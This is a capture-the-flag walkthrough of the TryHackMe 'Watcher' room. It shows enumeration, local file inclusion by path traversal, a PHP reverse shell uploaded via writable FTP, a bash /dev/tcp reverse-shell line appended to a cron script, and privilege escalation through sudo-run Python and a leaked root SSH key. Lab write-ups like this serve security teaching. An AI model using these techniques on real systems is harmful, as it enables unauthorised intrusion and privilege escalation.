Watcher Tryhackme Writeup

By Shamsher khan This is a Writeup of Tryhackme room “Watcher”

Image for post
Image for post
https://tryhackme.com/room/watcher

Room link: https://tryhackme.com/room/watcher
Note: This room is free

Introduction

Watcher was an eloquently constructed beginner level box designed to help introduce some key concepts and methods that are often seen across various penetration testing platforms. Despite not having any particularly difficult parts, it required some out of the box thinking as well as the ability to effectively analyse and chain together exploitation techniques. It’s a relatively long box, but provides a thoroughly enjoyable learning experience.

Initial Enumeration

Image for post
Image for post

Initial nmap scan shows the following ports:
21 vsftpd (up to date)
22 SSH 7.6p1 (up to date)
80 HTTP with Jekyll 4.1.1

Web Server

Running a gobuster on the web server:

gobuster dir -u 10.10.211.47 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt
Image for post
Image for post

Traversing to the website and checking the /robots.txt page shows some interesting pages.

Image for post
Image for post
Image for post
Image for post

/flag_1.txt contains the first flag. The second directory at /secret_file_do_not_read.txt can’t be accessed. Something to remember for later perhaps.

Image for post
Image for post

Going back to the initial webpage, there is little functionality aside from links from clicking the photo of each placemat.

Image for post
Image for post

The description page for each placemat has a GET parameter in the URL which displays the post that you’re looking at:

http://10.10.211.47/post.php?post=striped.php

Image for post
Image for post

The input for the GET parameter isn’t sanitized, so we can perform a local file inclusion attack. Going to http://10.10.211.47/post.php?post=../../../etc/passwd shows the users on the box.

Image for post
Image for post

Now we have a way to read files from the server. Thinking back to our initial exploration of the robots.txt file, there was a file we didn’t have access to, maybe we can get to it via the file inclusion vulnerability? We can assume the web “root” is /var/www/html as that’s the default location.

http://10.10.211.47/post.php?post=../../../var/www/html/secret_file_do_not_read.txt
Image for post
Image for post

We get credentials.

FTP

Now we have credentials, it is time to explore FTP! Connect and authenticate by using ftp 10.10.211.47. When logged in, running a dir command to list the contents of the directory shows the second flag is there, and a folder called files

Image for post
Image for post
Image for post
Image for post

The files directory is empty, but we can see from the permissions that it is writeable. In the original message that we got the credentials from, it says I’ve set the files to be saved to /home/ftpuser/ftp/files . Since we can write to this directory, we can upload things to the server.

Grab a php shell from pentest monkey’s github and edit it to contain your IP and the port you plan to host a netcat listener on.

Shell.php

Image for post
Image for post

Then go back into the ftp server and into the files folder and use the put command to upload the shell.

Image for post
Image for post

Since we know the path of the uploads, it is now possible to traverse to the php file and it will execute the code inside. However, we need a netcat listener sat waiting to catch the connection.

Image for post
Image for post

Then traverse to 10.10.211.47/post.php?post=../../../home/ftpuser/ftp/files/shell.php (Changing the name of the file to whatever you uploaded it as) and the listener should catch a reverse shell.

Image for post
Image for post
Image for post
Image for post

Here we got reverse shell

Get TTy shell

script -qc /bin/bash /dev/null

Personally, I always like to check out the web folder when I get into a box to see if there was any files or database credentials lying about. Going to /var/www/html and typing ls shows the contents of the directory. All files and directories there are the ones we saw before, aside from more_secrets_a9f10a

Image for post
Image for post

In here there is the third flag!

Lateral Movement

The next thing I do is check the less-used directories, such as /opt and /media, incase there’s anything lying about. In /opt/ there is a backups directory that is owned by root and accessible by the adm group, so there is a potential avenue if we get a user that is part of that group.

Image for post
Image for post

Going to the /home/ directories next, both toby and mat have note.txt that are readable

Image for post
Image for post

Since toby has flag 4, I'll assume that's the first user to get. The note talks about mat setting up cron jobs.

Image for post
Image for post

If we run sudo -l to check our sudo permissions, we can see that we can run ALL commands without a password as the user toby.

Image for post
Image for post
Image for post
Image for post

Going back to the information we found earlier about the cron jobs, I’m thinking we need to edit a running cronjob that executes as mat to get user as him instead. Checking the jobs folder, there is a cow.sh file that we own that constantly copies BEEFY pictures to the /tmp directory. It is owned by our current user, and so we can edit it. Examining the /etc/crontab shows that the script runs every minute as the user mat, so even though toby owns it, it executes in the context of the user running the cron.

Image for post
Image for post

Add a reverse shell into the file the cronjob executes, obviously changing the IP and port

But before start netcat reverse shell

nc -lvp 4444

echo 'bash -c "bash -i >& /dev/tcp/10.2.12.26/4444 0>&1"' >> cow.sh

Image for post
Image for post

Then after a minute or so, mat will execute the now malicious bash script and send us a reverse shell as his user.

Image for post
Image for post
Image for post
Image for post

We can now get flag 5.

In the note on mats home directory, we can see that will is explaining how he can run python3 scripts as his user using sudo. Running sudo -l confirms this

Image for post
Image for post

In the scripts directory, there is two files. cmd.py and will_script.py

Image for post
Image for post

At the end of will_script we can see it runs a system command that takes the parameter of cmd, which is set to whatever is the first argument after we run the script. The cmd script is owned by mat, and shows that if we put in a 1, it will perform ls -lah. If we put in a 2 it will perform id and a 3 it will cat /etc/passwd. will_script only allows those three commands it seems.

Image for post
Image for post

Since it’s hard to use text editors in a netcat shell due to env variables being off (I believe),

Since the files are in mats home directory, we add our revershell in cmd.py because can’t edit will_script.py but we can edit cmd.py

Image for post
Image for post

now start netcat listener

nc -lvp 3333
Image for post
Image for post

we can run will_script.py with the privileged of will user. but we can’t edit will_script.py so that’s why i can edit cmd.py and use AND operator to excute cmd.py with privileged of will user

Image for post
Image for post

and here we got shell

Image for post
Image for post

We got flag 6

Using id we can see that we are part of the adm group.. Remember that backups folder we found earlier that was owned by the adm group? Let's go check it out.

Image for post
Image for post

Echoing the key and piping to a base64 -d reveals a private key.

Image for post
Image for post

Save this to a file and remember to chmod 600 it.

Could it be that this is the root SSH key?!

Image for post
Image for post
Image for post
Image for post

And finally we got root flag

You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher

Image for post
Image for post

For more walkthroughs stay tuned…
Before you go…

Visit my other walkthrough’s:-

and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!

Web Application Pen-tester || CTF Player || Security Analyst

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store